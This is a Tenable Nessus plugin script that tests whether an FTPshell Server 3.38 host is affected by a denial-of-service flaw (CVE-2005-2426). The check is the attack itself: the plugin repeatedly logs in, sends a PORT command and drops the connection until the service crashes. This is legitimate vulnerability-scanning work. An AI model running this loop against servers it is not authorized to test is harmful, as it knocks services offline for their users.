code | #
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description) {
script_id(19303);
script_version("1.18");
script_cve_id("CVE-2005-2426");
script_bugtraq_id(14382);
script_name(english:"FTPshell Server 3.38 Malformed PORT/QUIT DoS");
script_set_attribute(attribute:"synopsis", value:
"The remote FTP service is affected by a denial of service vulnerability." );
script_set_attribute(attribute:"description", value:
"The remote host is using FTPshell, an FTP service for Windows.
The version of FTPshell installed on the remote host suffers from a
denial of service vulnerability that can be exploited by logging into
the service, sending a PORT command, and closing the connection without
QUITing, all 39 times." );
script_set_attribute(attribute:"see_also", value:"http://reedarvin.thearvins.com/20050725-01.html" );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2005/Jul/538" );
script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2005/07/27");
script_set_attribute(attribute:"vuln_publication_date", value: "2005/07/25");
script_cvs_date("Date: 2018/11/15 20:50:22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english:"Checks for denial of service vulnerability in FTPshell 3.38");
script_category(ACT_DENIAL);
script_family(english:"FTP");
script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
script_dependencie("ftpserver_detect_type_nd_version.nasl", "ftp_overflow.nasl");
script_require_keys("ftp/login", "ftp/password");
script_exclude_keys("ftp/msftpd", "ftp/ncftpd", "ftp/fw1ftpd", "ftp/vxftpd");
script_require_ports("Services/ftp", 21);
exit(0);
}
include("ftp_func.inc");
include("global_settings.inc");
port = get_ftp_port(default: 21);
# If it's for FTPshell...
banner = get_ftp_banner(port:port);
if (
banner &&
egrep(string:banner, pattern:"^220[ -] FTPshell Server Service")
) {
# nb: to exploit the vulnerability we need to log in.
user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");
if (!user || !pass) {
exit(0, "ftp/login and/or ftp/password are empty");
}
# Try to exploit the flaw.
#
# nb: we iterate one extra time to check if the service has crashed.
max = 40;
for (i=1; i<=max; i++) {
soc = open_sock_tcp(port);
# If we could open a socket...
if (soc) {
# nb: this sleep doesn't seem necessary but exists in the PoC.
# sleep(1);
if (ftp_authenticate(socket:soc, user:user, pass:pass)) {
# nb: there seems to be a timing issue as without this
# sleep the DoS doesn't work.
sleep(1);
# Send a PORT command.
c = string("PORT 127,0,0,1,18,12");
send(socket:soc, data:string(c, "\r\n"));
s = ftp_recv_line(socket:soc);
if (s) {
# nb: this sleep doesn't seem necessary but exists in the PoC.
# sleep(1);
# Close the socket (don't QUIT).
close(soc);
}
}
else if (i == 1) {
close(soc);
exit(1, "Cannot login on port "+port+" with supplied FTP credentials");
}
}
# If we couldn't open a socket after at least 1 iteration, there's a problem.
else if (i > 1) {
security_warning(port);
exit(0);
}
}
}
|